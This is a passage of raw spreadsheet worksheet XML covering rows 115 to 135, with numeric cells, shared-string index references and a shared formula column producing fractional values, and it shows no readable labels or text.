        <v>30</v>
      </c>
      <c r="N115" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O115" s="29">
        <v>4.0</v>
      </c>
      <c r="P115" s="29">
        <v>0.0</v>
      </c>
      <c r="Q115" s="15"/>
      <c r="R115" s="15"/>
      <c r="S115" s="15"/>
      <c r="T115" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U115" s="5"/>
      <c r="V115" s="5"/>
      <c r="W115" s="47"/>
      <c r="X115" s="45"/>
      <c r="Y115" s="45"/>
      <c r="Z115" s="38" t="s">
        <v>1464</v>
      </c>
      <c r="AA115" s="39" t="s">
        <v>1465</v>
      </c>
      <c r="AB115" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC115" s="40">
        <v>245438.0</v>
      </c>
      <c r="AD115" s="5"/>
      <c r="AE115" s="14"/>
      <c r="AF115" s="14"/>
    </row>
    <row r="116">
      <c r="A116" s="6">
        <f t="shared" si="1"/>
        <v>0.9560906575</v>
      </c>
      <c r="B116" s="29">
        <v>1.0</v>
      </c>
      <c r="C116" s="15"/>
      <c r="D116" s="14"/>
      <c r="E116" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F116" s="14"/>
      <c r="G116" s="29">
        <v>9.0</v>
      </c>
      <c r="H116" s="29">
        <v>2642.0</v>
      </c>
      <c r="I116" s="29">
        <v>115653.0</v>
      </c>
      <c r="J116" s="15"/>
      <c r="K116" s="29">
        <v>113729.0</v>
      </c>
      <c r="L116" s="15"/>
      <c r="M116" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N116" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O116" s="29">
        <v>2.0</v>
      </c>
      <c r="P116" s="29">
        <v>0.0</v>
      </c>
      <c r="Q116" s="15"/>
      <c r="R116" s="15"/>
      <c r="S116" s="15"/>
      <c r="T116" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U116" s="5"/>
      <c r="V116" s="5"/>
      <c r="W116" s="47"/>
      <c r="X116" s="45"/>
      <c r="Y116" s="45"/>
      <c r="Z116" s="38" t="s">
        <v>1466</v>
      </c>
      <c r="AA116" s="39" t="s">
        <v>1467</v>
      </c>
      <c r="AB116" s="38" t="s">
        <v>1468</v>
      </c>
      <c r="AC116" s="40">
        <v>178910.0</v>
      </c>
      <c r="AD116" s="5"/>
      <c r="AE116" s="14"/>
      <c r="AF116" s="14"/>
    </row>
    <row r="117">
      <c r="A117" s="6">
        <f t="shared" si="1"/>
        <v>0.1790911422</v>
      </c>
      <c r="B117" s="29">
        <v>1.0</v>
      </c>
      <c r="C117" s="15"/>
      <c r="D117" s="14"/>
      <c r="E117" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F117" s="14"/>
      <c r="G117" s="29">
        <v>-1.0</v>
      </c>
      <c r="H117" s="29">
        <v>241.0</v>
      </c>
      <c r="I117" s="29">
        <v>83035.0</v>
      </c>
      <c r="J117" s="15"/>
      <c r="K117" s="29">
        <v>83035.0</v>
      </c>
      <c r="L117" s="15"/>
      <c r="M117" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N117" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O117" s="29">
        <v>1.0</v>
      </c>
      <c r="P117" s="29">
        <v>10.0</v>
      </c>
      <c r="Q117" s="15"/>
      <c r="R117" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S117" s="15"/>
      <c r="T117" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U117" s="5"/>
      <c r="V117" s="5"/>
      <c r="W117" s="47"/>
      <c r="X117" s="45"/>
      <c r="Y117" s="45"/>
      <c r="Z117" s="38" t="s">
        <v>1469</v>
      </c>
      <c r="AA117" s="39" t="s">
        <v>1470</v>
      </c>
      <c r="AB117" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC117" s="40">
        <v>131712.0</v>
      </c>
      <c r="AD117" s="5"/>
      <c r="AE117" s="14"/>
      <c r="AF117" s="14"/>
    </row>
    <row r="118">
      <c r="A118" s="6">
        <f t="shared" si="1"/>
        <v>0.5590318773</v>
      </c>
      <c r="B118" s="29">
        <v>1.0</v>
      </c>
      <c r="C118" s="15"/>
      <c r="D118" s="14"/>
      <c r="E118" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F118" s="14"/>
      <c r="G118" s="29">
        <v>8.0</v>
      </c>
      <c r="H118" s="29">
        <v>3911.0</v>
      </c>
      <c r="I118" s="29">
        <v>91882.0</v>
      </c>
      <c r="J118" s="15"/>
      <c r="K118" s="29">
        <v>9374.0</v>
      </c>
      <c r="L118" s="15"/>
      <c r="M118" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N118" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O118" s="29">
        <v>2.0</v>
      </c>
      <c r="P118" s="29">
        <v>4.0</v>
      </c>
      <c r="Q118" s="15"/>
      <c r="R118" s="15"/>
      <c r="S118" s="15"/>
      <c r="T118" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U118" s="5"/>
      <c r="V118" s="5"/>
      <c r="W118" s="47"/>
      <c r="X118" s="45"/>
      <c r="Y118" s="45"/>
      <c r="Z118" s="38" t="s">
        <v>1471</v>
      </c>
      <c r="AA118" s="39" t="s">
        <v>1472</v>
      </c>
      <c r="AB118" s="38" t="s">
        <v>1473</v>
      </c>
      <c r="AC118" s="40">
        <v>105465.0</v>
      </c>
      <c r="AD118" s="5"/>
      <c r="AE118" s="14"/>
      <c r="AF118" s="14"/>
    </row>
    <row r="119">
      <c r="A119" s="6">
        <f t="shared" si="1"/>
        <v>0.8471758206</v>
      </c>
      <c r="B119" s="29">
        <v>1.0</v>
      </c>
      <c r="C119" s="29">
        <v>147390.0</v>
      </c>
      <c r="D119" s="14"/>
      <c r="E119" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F119" s="14"/>
      <c r="G119" s="29">
        <v>-1.0</v>
      </c>
      <c r="H119" s="29">
        <v>148.0</v>
      </c>
      <c r="I119" s="29">
        <v>135285.0</v>
      </c>
      <c r="J119" s="15"/>
      <c r="K119" s="29">
        <v>133337.0</v>
      </c>
      <c r="L119" s="15"/>
      <c r="M119" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N119" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O119" s="29">
        <v>1.0</v>
      </c>
      <c r="P119" s="29">
        <v>5.0</v>
      </c>
      <c r="Q119" s="15"/>
      <c r="R119" s="15"/>
      <c r="S119" s="15"/>
      <c r="T119" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U119" s="5"/>
      <c r="V119" s="5"/>
      <c r="W119" s="47"/>
      <c r="X119" s="45"/>
      <c r="Y119" s="45"/>
      <c r="Z119" s="38" t="s">
        <v>1474</v>
      </c>
      <c r="AA119" s="39" t="s">
        <v>1475</v>
      </c>
      <c r="AB119" s="38" t="s">
        <v>1476</v>
      </c>
      <c r="AC119" s="40">
        <v>147372.0</v>
      </c>
      <c r="AD119" s="5"/>
      <c r="AE119" s="14"/>
      <c r="AF119" s="14"/>
    </row>
    <row r="120">
      <c r="A120" s="6">
        <f t="shared" si="1"/>
        <v>0.1994859479</v>
      </c>
      <c r="B120" s="29">
        <v>1.0</v>
      </c>
      <c r="C120" s="14"/>
      <c r="D120" s="14"/>
      <c r="E120" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F120" s="14"/>
      <c r="G120" s="29">
        <v>2.0</v>
      </c>
      <c r="H120" s="29">
        <v>140.0</v>
      </c>
      <c r="I120" s="29">
        <v>44069.0</v>
      </c>
      <c r="J120" s="15"/>
      <c r="K120" s="15"/>
      <c r="L120" s="15"/>
      <c r="M120" s="15"/>
      <c r="N120" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O120" s="29">
        <v>0.0</v>
      </c>
      <c r="P120" s="29">
        <v>6.0</v>
      </c>
      <c r="Q120" s="15"/>
      <c r="R120" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S120" s="15"/>
      <c r="T120" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U120" s="5"/>
      <c r="V120" s="5"/>
      <c r="W120" s="47"/>
      <c r="X120" s="45"/>
      <c r="Y120" s="45"/>
      <c r="Z120" s="38" t="s">
        <v>1477</v>
      </c>
      <c r="AA120" s="39" t="s">
        <v>1478</v>
      </c>
      <c r="AB120" s="38" t="s">
        <v>1479</v>
      </c>
      <c r="AC120" s="40">
        <v>86024.0</v>
      </c>
      <c r="AD120" s="5"/>
      <c r="AE120" s="14"/>
      <c r="AF120" s="14"/>
    </row>
    <row r="121">
      <c r="A121" s="6">
        <f t="shared" si="1"/>
        <v>0.345221915</v>
      </c>
      <c r="B121" s="29">
        <v>1.0</v>
      </c>
      <c r="C121" s="29">
        <v>45273.0</v>
      </c>
      <c r="D121" s="14"/>
      <c r="E121" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F121" s="14"/>
      <c r="G121" s="29">
        <v>2.0</v>
      </c>
      <c r="H121" s="29">
        <v>970.0</v>
      </c>
      <c r="I121" s="29">
        <v>22401.0</v>
      </c>
      <c r="J121" s="15"/>
      <c r="K121" s="29">
        <v>22401.0</v>
      </c>
      <c r="L121" s="15"/>
      <c r="M121" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N121" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O121" s="29">
        <v>1.0</v>
      </c>
      <c r="P121" s="29">
        <v>5.0</v>
      </c>
      <c r="Q121" s="15"/>
      <c r="R121" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S121" s="15"/>
      <c r="T121" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U121" s="5"/>
      <c r="V121" s="5"/>
      <c r="W121" s="47"/>
      <c r="X121" s="45"/>
      <c r="Y121" s="45"/>
      <c r="Z121" s="38" t="s">
        <v>1480</v>
      </c>
      <c r="AA121" s="39" t="s">
        <v>1481</v>
      </c>
      <c r="AB121" s="38" t="s">
        <v>1482</v>
      </c>
      <c r="AC121" s="40">
        <v>45265.0</v>
      </c>
      <c r="AD121" s="5"/>
      <c r="AE121" s="14"/>
      <c r="AF121" s="14"/>
    </row>
    <row r="122">
      <c r="A122" s="6">
        <f t="shared" si="1"/>
        <v>0.9466309784</v>
      </c>
      <c r="B122" s="29">
        <v>1.0</v>
      </c>
      <c r="C122" s="15"/>
      <c r="D122" s="14"/>
      <c r="E122" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F122" s="14"/>
      <c r="G122" s="29">
        <v>17.0</v>
      </c>
      <c r="H122" s="29">
        <v>5934.0</v>
      </c>
      <c r="I122" s="29">
        <v>141087.0</v>
      </c>
      <c r="J122" s="15"/>
      <c r="K122" s="29">
        <v>141087.0</v>
      </c>
      <c r="L122" s="15"/>
      <c r="M122" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N122" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O122" s="29">
        <v>2.0</v>
      </c>
      <c r="P122" s="29">
        <v>3.0</v>
      </c>
      <c r="Q122" s="15"/>
      <c r="R122" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S122" s="15"/>
      <c r="T122" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U122" s="5"/>
      <c r="V122" s="5"/>
      <c r="W122" s="47"/>
      <c r="X122" s="45"/>
      <c r="Y122" s="45"/>
      <c r="Z122" s="38" t="s">
        <v>1483</v>
      </c>
      <c r="AA122" s="39" t="s">
        <v>1484</v>
      </c>
      <c r="AB122" s="38" t="s">
        <v>1485</v>
      </c>
      <c r="AC122" s="40">
        <v>190494.0</v>
      </c>
      <c r="AD122" s="5"/>
      <c r="AE122" s="14"/>
      <c r="AF122" s="14"/>
    </row>
    <row r="123">
      <c r="A123" s="6">
        <f t="shared" si="1"/>
        <v>0.7422219877</v>
      </c>
      <c r="B123" s="29">
        <v>1.0</v>
      </c>
      <c r="C123" s="14"/>
      <c r="D123" s="14"/>
      <c r="E123" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F123" s="14"/>
      <c r="G123" s="29">
        <v>5.0</v>
      </c>
      <c r="H123" s="29">
        <v>440.0</v>
      </c>
      <c r="I123" s="29">
        <v>476.0</v>
      </c>
      <c r="J123" s="15"/>
      <c r="K123" s="29">
        <v>476.0</v>
      </c>
      <c r="L123" s="15"/>
      <c r="M123" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N123" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O123" s="29">
        <v>2.0</v>
      </c>
      <c r="P123" s="29">
        <v>2.0</v>
      </c>
      <c r="Q123" s="15"/>
      <c r="R123" s="15"/>
      <c r="S123" s="15"/>
      <c r="T123" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U123" s="5"/>
      <c r="V123" s="5"/>
      <c r="W123" s="47"/>
      <c r="X123" s="45"/>
      <c r="Y123" s="45"/>
      <c r="Z123" s="38" t="s">
        <v>1486</v>
      </c>
      <c r="AA123" s="39" t="s">
        <v>1487</v>
      </c>
      <c r="AB123" s="38" t="s">
        <v>1488</v>
      </c>
      <c r="AC123" s="40">
        <v>147889.0</v>
      </c>
      <c r="AD123" s="5"/>
      <c r="AE123" s="14"/>
      <c r="AF123" s="14"/>
    </row>
    <row r="124">
      <c r="A124" s="6">
        <f t="shared" si="1"/>
        <v>0.9832737686</v>
      </c>
      <c r="B124" s="29">
        <v>1.0</v>
      </c>
      <c r="C124" s="15"/>
      <c r="D124" s="14"/>
      <c r="E124" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F124" s="14"/>
      <c r="G124" s="29">
        <v>3.0</v>
      </c>
      <c r="H124" s="29">
        <v>396.0</v>
      </c>
      <c r="I124" s="29">
        <v>70176.0</v>
      </c>
      <c r="J124" s="15"/>
      <c r="K124" s="15"/>
      <c r="L124" s="14"/>
      <c r="M124" s="15"/>
      <c r="N124" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O124" s="29">
        <v>1.0</v>
      </c>
      <c r="P124" s="29">
        <v>0.0</v>
      </c>
      <c r="Q124" s="15"/>
      <c r="R124" s="15"/>
      <c r="S124" s="15"/>
      <c r="T124" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U124" s="5"/>
      <c r="V124" s="5"/>
      <c r="W124" s="47"/>
      <c r="X124" s="45"/>
      <c r="Y124" s="45"/>
      <c r="Z124" s="38" t="s">
        <v>1489</v>
      </c>
      <c r="AA124" s="39" t="s">
        <v>1490</v>
      </c>
      <c r="AB124" s="38" t="s">
        <v>1491</v>
      </c>
      <c r="AC124" s="40">
        <v>191249.0</v>
      </c>
      <c r="AD124" s="5"/>
      <c r="AE124" s="14"/>
      <c r="AF124" s="14"/>
    </row>
    <row r="125">
      <c r="A125" s="6">
        <f t="shared" si="1"/>
        <v>0.7551810669</v>
      </c>
      <c r="B125" s="29">
        <v>1.0</v>
      </c>
      <c r="C125" s="15"/>
      <c r="D125" s="14"/>
      <c r="E125" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F125" s="14"/>
      <c r="G125" s="29">
        <v>2.0</v>
      </c>
      <c r="H125" s="29">
        <v>1003.0</v>
      </c>
      <c r="I125" s="29">
        <v>108324.0</v>
      </c>
      <c r="J125" s="15"/>
      <c r="K125" s="15"/>
      <c r="L125" s="15"/>
      <c r="M125" s="14"/>
      <c r="N125" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O125" s="29">
        <v>0.0</v>
      </c>
      <c r="P125" s="29">
        <v>3.0</v>
      </c>
      <c r="Q125" s="15"/>
      <c r="R125" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S125" s="15"/>
      <c r="T125" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U125" s="5"/>
      <c r="V125" s="5"/>
      <c r="W125" s="47"/>
      <c r="X125" s="45"/>
      <c r="Y125" s="45"/>
      <c r="Z125" s="38" t="s">
        <v>1492</v>
      </c>
      <c r="AA125" s="39" t="s">
        <v>1493</v>
      </c>
      <c r="AB125" s="38" t="s">
        <v>1494</v>
      </c>
      <c r="AC125" s="40">
        <v>209558.0</v>
      </c>
      <c r="AD125" s="5"/>
      <c r="AE125" s="14"/>
      <c r="AF125" s="14"/>
    </row>
    <row r="126">
      <c r="A126" s="6">
        <f t="shared" si="1"/>
        <v>0.7720005954</v>
      </c>
      <c r="B126" s="29">
        <v>1.0</v>
      </c>
      <c r="C126" s="29">
        <v>107280.0</v>
      </c>
      <c r="D126" s="14"/>
      <c r="E126" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F126" s="14"/>
      <c r="G126" s="29">
        <v>7.0</v>
      </c>
      <c r="H126" s="29">
        <v>414.0</v>
      </c>
      <c r="I126" s="29">
        <v>93588.0</v>
      </c>
      <c r="J126" s="15"/>
      <c r="K126" s="29">
        <v>86735.0</v>
      </c>
      <c r="L126" s="15"/>
      <c r="M126" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N126" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O126" s="29">
        <v>3.0</v>
      </c>
      <c r="P126" s="29">
        <v>6.0</v>
      </c>
      <c r="Q126" s="15"/>
      <c r="R126" s="15"/>
      <c r="S126" s="15"/>
      <c r="T126" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U126" s="5"/>
      <c r="V126" s="5"/>
      <c r="W126" s="47"/>
      <c r="X126" s="45"/>
      <c r="Y126" s="45"/>
      <c r="Z126" s="38" t="s">
        <v>1495</v>
      </c>
      <c r="AA126" s="39" t="s">
        <v>1496</v>
      </c>
      <c r="AB126" s="38" t="s">
        <v>1497</v>
      </c>
      <c r="AC126" s="40">
        <v>107169.0</v>
      </c>
      <c r="AD126" s="5"/>
      <c r="AE126" s="14"/>
      <c r="AF126" s="14"/>
    </row>
    <row r="127">
      <c r="A127" s="6">
        <f t="shared" si="1"/>
        <v>0.9373290222</v>
      </c>
      <c r="B127" s="29">
        <v>1.0</v>
      </c>
      <c r="C127" s="15"/>
      <c r="D127" s="14"/>
      <c r="E127" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F127" s="14"/>
      <c r="G127" s="29">
        <v>5.0</v>
      </c>
      <c r="H127" s="29">
        <v>4825.0</v>
      </c>
      <c r="I127" s="29">
        <v>566.0</v>
      </c>
      <c r="J127" s="15"/>
      <c r="K127" s="29">
        <v>31854.0</v>
      </c>
      <c r="L127" s="15"/>
      <c r="M127" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N127" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O127" s="29">
        <v>3.0</v>
      </c>
      <c r="P127" s="29">
        <v>3.0</v>
      </c>
      <c r="Q127" s="15"/>
      <c r="R127" s="15"/>
      <c r="S127" s="15"/>
      <c r="T127" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U127" s="5"/>
      <c r="V127" s="5"/>
      <c r="W127" s="47"/>
      <c r="X127" s="45"/>
      <c r="Y127" s="45"/>
      <c r="Z127" s="38" t="s">
        <v>1498</v>
      </c>
      <c r="AA127" s="39" t="s">
        <v>1499</v>
      </c>
      <c r="AB127" s="38" t="s">
        <v>1500</v>
      </c>
      <c r="AC127" s="40">
        <v>3570.0</v>
      </c>
      <c r="AD127" s="5"/>
      <c r="AE127" s="14"/>
      <c r="AF127" s="14"/>
    </row>
    <row r="128">
      <c r="A128" s="6">
        <f t="shared" si="1"/>
        <v>0.2719915243</v>
      </c>
      <c r="B128" s="29">
        <v>1.0</v>
      </c>
      <c r="C128" s="29">
        <v>267758.0</v>
      </c>
      <c r="D128" s="14"/>
      <c r="E128" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F128" s="14"/>
      <c r="G128" s="29">
        <v>0.0</v>
      </c>
      <c r="H128" s="29">
        <v>171.0</v>
      </c>
      <c r="I128" s="29">
        <v>281048.0</v>
      </c>
      <c r="J128" s="15"/>
      <c r="K128" s="15"/>
      <c r="L128" s="15"/>
      <c r="M128" s="14"/>
      <c r="N128" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O128" s="29">
        <v>1.0</v>
      </c>
      <c r="P128" s="29">
        <v>2.0</v>
      </c>
      <c r="Q128" s="15"/>
      <c r="R128" s="15"/>
      <c r="S128" s="15"/>
      <c r="T128" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U128" s="5"/>
      <c r="V128" s="5"/>
      <c r="W128" s="47"/>
      <c r="X128" s="45"/>
      <c r="Y128" s="45"/>
      <c r="Z128" s="38" t="s">
        <v>1501</v>
      </c>
      <c r="AA128" s="39" t="s">
        <v>1502</v>
      </c>
      <c r="AB128" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC128" s="40">
        <v>267755.0</v>
      </c>
      <c r="AD128" s="5"/>
      <c r="AE128" s="14"/>
      <c r="AF128" s="14"/>
    </row>
    <row r="129">
      <c r="A129" s="6">
        <f t="shared" si="1"/>
        <v>0.7285911279</v>
      </c>
      <c r="B129" s="29">
        <v>1.0</v>
      </c>
      <c r="C129" s="15"/>
      <c r="D129" s="14"/>
      <c r="E129" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F129" s="14"/>
      <c r="G129" s="29">
        <v>19.0</v>
      </c>
      <c r="H129" s="29">
        <v>3368.0</v>
      </c>
      <c r="I129" s="29">
        <v>272135.0</v>
      </c>
      <c r="J129" s="15"/>
      <c r="K129" s="15"/>
      <c r="L129" s="15"/>
      <c r="M129" s="14"/>
      <c r="N129" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O129" s="29">
        <v>3.0</v>
      </c>
      <c r="P129" s="29">
        <v>4.0</v>
      </c>
      <c r="Q129" s="15"/>
      <c r="R129" s="15"/>
      <c r="S129" s="15"/>
      <c r="T129" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U129" s="5"/>
      <c r="V129" s="5"/>
      <c r="W129" s="47"/>
      <c r="X129" s="45"/>
      <c r="Y129" s="45"/>
      <c r="Z129" s="38" t="s">
        <v>1503</v>
      </c>
      <c r="AA129" s="39" t="s">
        <v>1504</v>
      </c>
      <c r="AB129" s="38" t="s">
        <v>1505</v>
      </c>
      <c r="AC129" s="40">
        <v>258377.0</v>
      </c>
      <c r="AD129" s="5"/>
      <c r="AE129" s="14"/>
      <c r="AF129" s="14"/>
    </row>
    <row r="130">
      <c r="A130" s="6">
        <f t="shared" si="1"/>
        <v>0.6677164824</v>
      </c>
      <c r="B130" s="29">
        <v>1.0</v>
      </c>
      <c r="C130" s="29">
        <v>258430.0</v>
      </c>
      <c r="D130" s="14"/>
      <c r="E130" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F130" s="14"/>
      <c r="G130" s="29">
        <v>0.0</v>
      </c>
      <c r="H130" s="29">
        <v>257.0</v>
      </c>
      <c r="I130" s="15"/>
      <c r="J130" s="5" t="s">
        <v>1506</v>
      </c>
      <c r="K130" s="15"/>
      <c r="L130" s="5" t="s">
        <v>1506</v>
      </c>
      <c r="M130" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N130" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O130" s="29">
        <v>1.0</v>
      </c>
      <c r="P130" s="29">
        <v>3.0</v>
      </c>
      <c r="Q130" s="15"/>
      <c r="R130" s="15"/>
      <c r="S130" s="15"/>
      <c r="T130" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U130" s="5"/>
      <c r="V130" s="5"/>
      <c r="W130" s="47"/>
      <c r="X130" s="45"/>
      <c r="Y130" s="45"/>
      <c r="Z130" s="38" t="s">
        <v>1507</v>
      </c>
      <c r="AA130" s="39" t="s">
        <v>1508</v>
      </c>
      <c r="AB130" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC130" s="40">
        <v>258429.0</v>
      </c>
      <c r="AD130" s="5"/>
      <c r="AE130" s="14"/>
      <c r="AF130" s="14"/>
    </row>
    <row r="131">
      <c r="A131" s="6">
        <f t="shared" si="1"/>
        <v>0.01460311381</v>
      </c>
      <c r="B131" s="29">
        <v>1.0</v>
      </c>
      <c r="C131" s="29">
        <v>34560.0</v>
      </c>
      <c r="D131" s="14"/>
      <c r="E131" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F131" s="14"/>
      <c r="G131" s="29">
        <v>20.0</v>
      </c>
      <c r="H131" s="29">
        <v>192496.0</v>
      </c>
      <c r="I131" s="29">
        <v>24910.0</v>
      </c>
      <c r="J131" s="15"/>
      <c r="K131" s="29">
        <v>24910.0</v>
      </c>
      <c r="L131" s="15"/>
      <c r="M131" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N131" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O131" s="29">
        <v>2.0</v>
      </c>
      <c r="P131" s="29">
        <v>3.0</v>
      </c>
      <c r="Q131" s="15"/>
      <c r="R131" s="15"/>
      <c r="S131" s="15"/>
      <c r="T131" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U131" s="5"/>
      <c r="V131" s="5"/>
      <c r="W131" s="47"/>
      <c r="X131" s="45"/>
      <c r="Y131" s="45"/>
      <c r="Z131" s="38" t="s">
        <v>1509</v>
      </c>
      <c r="AA131" s="39" t="s">
        <v>1510</v>
      </c>
      <c r="AB131" s="38" t="s">
        <v>1511</v>
      </c>
      <c r="AC131" s="40">
        <v>34518.0</v>
      </c>
      <c r="AD131" s="5"/>
      <c r="AE131" s="14"/>
      <c r="AF131" s="14"/>
    </row>
    <row r="132">
      <c r="A132" s="6">
        <f t="shared" si="1"/>
        <v>0.4623670788</v>
      </c>
      <c r="B132" s="29">
        <v>1.0</v>
      </c>
      <c r="C132" s="29">
        <v>178280.0</v>
      </c>
      <c r="D132" s="14"/>
      <c r="E132" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F132" s="14"/>
      <c r="G132" s="29">
        <v>2.0</v>
      </c>
      <c r="H132" s="29">
        <v>195.0</v>
      </c>
      <c r="I132" s="29">
        <v>21517.0</v>
      </c>
      <c r="J132" s="15"/>
      <c r="K132" s="29">
        <v>42068.0</v>
      </c>
      <c r="L132" s="15"/>
      <c r="M132" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N132" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O132" s="29">
        <v>2.0</v>
      </c>
      <c r="P132" s="29">
        <v>5.0</v>
      </c>
      <c r="Q132" s="15"/>
      <c r="R132" s="15"/>
      <c r="S132" s="15"/>
      <c r="T132" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U132" s="5"/>
      <c r="V132" s="5"/>
      <c r="W132" s="47"/>
      <c r="X132" s="45"/>
      <c r="Y132" s="45"/>
      <c r="Z132" s="38" t="s">
        <v>1512</v>
      </c>
      <c r="AA132" s="39" t="s">
        <v>1513</v>
      </c>
      <c r="AB132" s="38" t="s">
        <v>1514</v>
      </c>
      <c r="AC132" s="40">
        <v>178262.0</v>
      </c>
      <c r="AD132" s="5"/>
      <c r="AE132" s="14"/>
      <c r="AF132" s="14"/>
    </row>
    <row r="133">
      <c r="A133" s="6">
        <f t="shared" si="1"/>
        <v>0.5502165086</v>
      </c>
      <c r="B133" s="29">
        <v>1.0</v>
      </c>
      <c r="C133" s="15"/>
      <c r="D133" s="14"/>
      <c r="E133" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F133" s="14"/>
      <c r="G133" s="29">
        <v>0.0</v>
      </c>
      <c r="H133" s="29">
        <v>86.0</v>
      </c>
      <c r="I133" s="29">
        <v>293665.0</v>
      </c>
      <c r="J133" s="15"/>
      <c r="K133" s="29">
        <v>71850.0</v>
      </c>
      <c r="L133" s="15"/>
      <c r="M133" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N133" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O133" s="29">
        <v>1.0</v>
      </c>
      <c r="P133" s="29">
        <v>0.0</v>
      </c>
      <c r="Q133" s="15"/>
      <c r="R133" s="15"/>
      <c r="S133" s="15"/>
      <c r="T133" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U133" s="5"/>
      <c r="V133" s="5"/>
      <c r="W133" s="47"/>
      <c r="X133" s="45"/>
      <c r="Y133" s="45"/>
      <c r="Z133" s="38" t="s">
        <v>1515</v>
      </c>
      <c r="AA133" s="39" t="s">
        <v>1516</v>
      </c>
      <c r="AB133" s="38" t="s">
        <v>1296</v>
      </c>
      <c r="AC133" s="40">
        <v>270549.0</v>
      </c>
      <c r="AD133" s="5"/>
      <c r="AE133" s="14"/>
      <c r="AF133" s="14"/>
    </row>
    <row r="134">
      <c r="A134" s="6">
        <f t="shared" si="1"/>
        <v>0.0316492771</v>
      </c>
      <c r="B134" s="29">
        <v>1.0</v>
      </c>
      <c r="C134" s="15"/>
      <c r="D134" s="14"/>
      <c r="E134" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F134" s="14"/>
      <c r="G134" s="29">
        <v>4.0</v>
      </c>
      <c r="H134" s="29">
        <v>598.0</v>
      </c>
      <c r="I134" s="29">
        <v>175686.0</v>
      </c>
      <c r="J134" s="15"/>
      <c r="K134" s="15"/>
      <c r="L134" s="15"/>
      <c r="M134" s="14"/>
      <c r="N134" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O134" s="29">
        <v>1.0</v>
      </c>
      <c r="P134" s="29">
        <v>7.0</v>
      </c>
      <c r="Q134" s="15"/>
      <c r="R134" s="15"/>
      <c r="S134" s="15"/>
      <c r="T134" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U134" s="5"/>
      <c r="V134" s="5"/>
      <c r="W134" s="47"/>
      <c r="X134" s="45"/>
      <c r="Y134" s="45"/>
      <c r="Z134" s="38" t="s">
        <v>1517</v>
      </c>
      <c r="AA134" s="39" t="s">
        <v>1518</v>
      </c>
      <c r="AB134" s="38" t="s">
        <v>1519</v>
      </c>
      <c r="AC134" s="40">
        <v>183702.0</v>
      </c>
      <c r="AD134" s="5"/>
      <c r="AE134" s="14"/>
      <c r="AF134" s="14"/>
    </row>
    <row r="135">
      <c r="A135" s="6">
        <f t="shared" si="1"/>
